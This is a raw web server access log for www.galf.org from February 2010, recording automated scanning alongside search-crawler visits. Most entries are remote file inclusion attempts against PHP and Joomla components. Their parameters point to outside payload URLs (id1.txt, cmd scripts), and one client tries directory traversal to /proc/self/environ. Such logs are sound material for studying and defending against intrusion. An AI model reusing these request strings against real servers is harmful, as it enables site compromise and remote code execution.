219.240.36.36 - - [14/Feb/2010:18:53:46 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:18:54:07 -0800] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:54:41 -0800] "GET /logs/access_090720.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:56:20 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:56:41 -0800] "GET /logs/access_090720.log//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:56:41 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:57:00 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:57:00 -0800] "GET /logs/access_090720.log//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:57:00 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:57:24 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:57:25 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:57:25 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:58:42 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.40 - - [14/Feb/2010:18:59:59 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 6.1; MSNbDELL; MSNmen-us; MSNc00; MSNc00)" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:19:00:19 -0800] "GET /logs/access_090720.log///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:00:25 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:00:25 -0800] "GET /logs/access_100201.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:00:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:02:03 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:02:03 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:02:03 -0800] "GET /logs/access_100201.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:02:18 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:02:18 -0800] "GET /logs/access_100201.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:19:02:18 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:19:05:29 -0800] "GET /logs/access_090713.log///include/admin.lib.inc.php?site_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:19:05:30 -0800] "GET /logs/access_090713.log///include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:19:05:30 -0800] "GET /logs/access_090713.log///include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:19:05:30 -0800] "GET /logs/access_090713.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:08:40 -0800] "GET /logs/ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:08:40 -0800] "GET /ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:08:40 -0800] "GET /logs/access_091207.log/ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:10:05 -0800] "GET /logs/ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:10:05 -0800] "GET /logs/access_091207.log/ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:10:05 -0800] "GET /ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:10:14 -0800] "GET /logs/access_091207.log/ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:10:14 -0800] "GET /ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.153 - - [14/Feb/2010:19:10:14 -0800] "GET /logs/ashheadlines.php?pathtoashnews=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.6.14 - - [14/Feb/2010:19:12:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
77.88.25.28 - - [14/Feb/2010:19:12:05 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
65.55.106.136 - - [14/Feb/2010:19:14:11 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:19:15:51 -0800] "GET /logs/access_090713.log///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:16:40 -0800] "GET /logs/access_100125.log/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.136 - - [14/Feb/2010:19:17:24 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:19:21:46 -0800] "GET /logs/access_100201.log///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:19:22:34 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:19:29:44 -0800] "GET /?sourcedir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:19:29:44 -0800] "GET /logs/?sourcedir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:19:29:46 -0800] "GET /logs/access_090907.log/?sourcedir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:19:29:46 -0800] "GET /logs/access_090921.log/?sourcedir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:30:38 -0800] "GET /logs/access_090817.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:30:38 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:30:38 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:34:22 -0800] "GET /logs/access_090720.log%20%20/?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:34:22 -0800] "GET /logs/?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:34:22 -0800] "GET /?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:35:58 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:35:58 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:35:58 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:35:59 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:35:59 -0800] "GET /logs/access_100111.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:35:59 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:35:59 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:36:15 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:36:15 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:36:15 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:19:36:16 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:19:36:29 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:19:36:29 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:19:36:30 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
208.93.149.176 - - [14/Feb/2010:19:36:30 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:36:52 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:36:52 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:36:59 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:36:59 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:37:01 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:37:01 -0800] "GET /logs/access_100125.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:37:01 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:37:04 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:37:04 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:37:04 -0800] "GET /logs/access_100125.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:17 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:18 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:37:21 -0800] "GET /?SERVER_[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:37:21 -0800] "GET /logs/access_090720.log%20%20/?SERVER_[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:37:27 -0800] "GET /logs/?SERVER_[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:27 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:27 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:33 -0800] "GET /logs/access_090928.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:37:34 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:19:37:47 -0800] "GET /logs/access_091109.log/?sourcedir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:40:59 -0800] "GET /logs/access_100125.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:41:42 -0800] "GET /logs/access_090720.log/?SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:41:52 -0800] "GET /logs/access_090817.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:41:52 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:41:52 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:41:58 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:41:58 -0800] "GET /logs/access_100111.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:41:58 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:42:11 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:42:11 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:42:11 -0800] "GET /logs/access_090817.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:42:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:42:20 -0800] "GET /logs/access_100111.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:19:42:21 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.216.11 - - [14/Feb/2010:19:42:24 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:19:43:04 -0800] "GET /logs/access_090622.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:19:43:39 -0800] "GET /logs/access_091005.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:45:16 -0800] "GET /logs/access_090720.log/?SERVER_[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:45:28 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:45:28 -0800] "GET /logs/access_091012.log%20/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:45:44 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
208.82.115.69 - - [14/Feb/2010:19:46:28 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
